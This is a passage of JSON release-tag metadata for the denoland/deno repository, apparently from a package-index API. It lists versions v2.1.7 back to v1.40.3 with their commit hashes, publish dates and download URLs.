1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_